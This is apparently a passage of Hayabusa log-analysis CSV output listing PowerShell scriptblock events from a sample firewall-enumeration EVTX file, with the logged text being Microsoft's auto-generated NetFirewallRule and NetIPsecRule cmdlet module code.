([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdle",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 
'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 
'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 
'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecRule ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration 
Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] 
[string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultVa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,lue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
